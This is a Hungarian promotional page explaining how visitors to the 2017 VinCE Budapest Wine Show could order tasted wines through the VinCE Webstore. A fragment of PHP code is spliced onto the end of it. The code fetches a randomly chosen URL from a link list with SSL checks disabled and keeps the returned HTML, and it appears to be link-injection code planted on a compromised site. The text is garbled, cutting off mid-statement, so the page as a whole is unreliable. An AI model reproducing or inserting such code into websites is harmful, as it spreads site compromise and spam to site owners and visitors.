-->

VinCE Webstore – Kóstolja és rendelje meg azonnal!

Mi ez? A VinCE Webstore egy olyan szolgáltatás a VinCE Budapest Wine Show látogatóinak, melynek segítségével az eseményen megkóstolt borokat okos eszközük segítségével azonnal, kedvező áron megvehetik online felületen. A webstore “nyitvatartási ideje” 2017 március 13 és 26 között lesz. Miért hasznos ez számomra? Ha megtetszett egy bor nem kell meg- vagy feljegyeznie, egy kamerás... Tovább..


Mi ez?

A VinCE Webstore egy olyan szolgáltatás a VinCE Budapest Wine Show látogatóinak, melynek segítségével az eseményen megkóstolt borokat okos eszközük segítségével azonnal, kedvező áron megvehetik online felületen. A webstore “nyitvatartási ideje” 2017 március 13 és 26 között lesz.

Miért hasznos ez számomra?

Ha megtetszett egy bor nem kell meg- vagy feljegyeznie, egy kamerás mobillal azonnal kiválaszthatja és megrendelheti a regisztrációhoz megadott email azonosítója segítségével.

A résztvevő borászatok kedvezményesen (pinceáron) kínálják boraikat.

Többféle bort jelölhet meg, melyeket együtt szállítunk ki a VinCE Budapest Wine Show-t követően. A legkisebb kiszállítható mennyiség 6 palack, de ez többféle borból is állhat.

Hogyan használjam?

Lépjen be a VinCE webstore-ba mobileszközével QR kód segítségével vagy gépelje be a www.vinbud.hu címet. Jegyvásárláskor megadott regisztrációs adatai segítségével lépjen be a webáruházba. Célszerű az esemény előtt belépni, belépési email címét és jelszavát elmenteni, hogy a VinCE alkalmával már ezzel már ne kelljen foglalkoznia.

A résztvevő borászok a standszámuk – 3 jegyű szám – vagy nevük beírásával választhatók ki a keresőben. A standszámot megtalálja a kiállító asztalán, a kóstolókönyvben vagy a vincebudapest.hu weblapon.

A borászat kiválasztása után megjelennek a megvásárolható borok, válassza ki a megkedvelt bort, mennyiséget és tegye kosarába.

Újabb standszám vagy borászat nevének beírásával folytathatja a vásárlást.

Miután a borok kiválasztásával végzett, nézze meg a kosarában a rendelni kívánt tételeket.

Adja meg a szállítási címet, a számlaadatokat. Bankkártyája segítségével fizethet online.

Amennyiben később kívánja megrendelni és kifizetni a kosár tartalmának mentése automatikus.

Kosara tartalmát bármikor ellenőrizheti és megvásárolhatja, ha belép a www.vincebudapest.hu honlapon a VinCE Webstore menüpontba.

A megrendelt borokról visszaigazolást küldünk email címére a megadott szállítási cím, borok vételára, a szállítási díj és a teljes összeg feltüntetésével.

Vásárlásáról számlát a regisztráció alkalmával megadott számlázási adatok felhasználásával postai úton kapja meg.

Ugye milyen egyszerű?


html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>